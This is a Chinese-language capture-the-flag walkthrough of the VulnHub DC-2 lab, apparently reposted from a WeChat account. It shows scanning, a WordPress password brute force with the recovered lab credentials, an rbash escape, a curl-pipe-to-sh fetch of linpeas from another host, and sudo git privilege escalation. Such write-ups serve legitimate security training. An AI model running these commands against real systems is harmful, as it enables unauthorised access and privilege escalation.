描述
与 DC-1 非常相似,DC-2 是另一个专门建造的易受攻击实验室,目的是获得渗透测试领域的经验。
与最初的 DC-1 一样,它的设计考虑到了初学者。
必须具备 Linux 技能和熟悉 Linux 命令行,以及具备一些基本渗透测试工具的经验。
就像 DC-1 一样,有五个标志,包括最后一个标志。
再说一次,就像 DC-1 一样,这些标志对初学者很重要,但对有经验的人来说并不那么重要。
简而言之,唯一真正重要的标志是最后一面旗帜。
对于初学者来说,Google 是您的朋友。嗯,除了所有的隐私问题等。
我还没有探索实现 root 的所有方法,因为我放弃了我一直在努力的上一个版本,除了基本操作系统安装之外,我完全从头开始。
官网下载地址:https://www.vulnhub.com/entry/dc-2,311/
下载完成之后解压用vm虚拟机打开镜像,打开之后把桥接改成NAT就可以了。然后开机开搞
nmap 192.168.40.0/24
nmap -A -sV -T4 -p- 192.168.40.146
cewl http://dc-2/ -w passwd.txt
dirsearch -u http://dc-2/
apt install wpscan
wpscan使用方法
–version
| 显示WPScan的版本信息
-o | 输出文件到指定位置
-f | 指定文件输出的格式
–user-agent
| 使用指定的ua头
–random-user-agent | 使用随机UA头
–max-threads| 最大线程数,默认最大线程为5
–proxy | 加载代理
–update| 更新漏洞库
–force
| 不检测目标是否在运行wordpress
–api-token | 使用token用于显示漏洞信息
–wp-content DIR| 自定义指定检测内容
–cookie | 指定cookie
vp | 结果中显示有漏洞的插件
ap | 结果中显示目标的所有插件
vt | 结果中显示存在漏洞的主题
at| 结果中显示所有主题
tt| 列举缩略图相关的文件
–enumerate/-e| 枚举 option
u | 枚举用户名
p| 枚举插件
t| 枚举主题
用WPScan枚举一下它的用户名,如果一次不出来就仔细检查一下是什么原因,不要一直爆,因为我们是免费的每天有使用次数用完就没了
wpscan --url http://dc-2/ -e u
出来了3个用户名,把爆出来的用户名放到文件里,开始爆破密码
wpscan --url http://dc-2/ -U user.txt -P passwd.txt
出来了两个账户和密码,Jerry/adipiscing ,tom/parturient,登录一下看看
登录成功,又开始找东西了,直接开查找看flag
flag2提示说不能利用Wordpress走捷径,这里我猜的是里面应该有文件上传但是提示说不能走捷径,另外一条路可能就是7744端口的ssh了,用ssh登录一下,tom/parturient这个用户登录成功了
ssh tom@192.168.40.146 -p 7744
查看目录文件看到了flag3,但是我查看的时候被rbash阻止了,直接看usr里面的内容,发现只有这几个命令可以用
cat查看用不了我用别的,我用vi编辑,看到了里面的内容
vi flag3.txt
BASH_CMDS[a]=/bin/sh;a
##这行代码的意思是将数组 BASH_CMDS 中下标为 a 的元素设置为 /bin/sh。这意味着 BASH_CMDS[a] 现在保存的是 /bin/sh ,即指向系统默认的 shell;a表示执行
export -p //查看环境变量
BASH_CMDS[a]=/bin/sh;a //把/bin/sh给a
/bin/bash
export PATH=$PATH:/bin/ //添加环境变量
export PATH=$PATH:/usr/bin //添加环境变量
curl 192.168.40.130:2222/linpeas.sh | sh
sudo git help config #查看帮助文档
!'sh' #按esc输入完成提权!
1.重定向
2.cewl使用
3.wpscan使用
4.rbash绕过
5.git提权
原文始发于微信公众号(信安一把索):渗透测试 - DC-2 - 练习篇
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论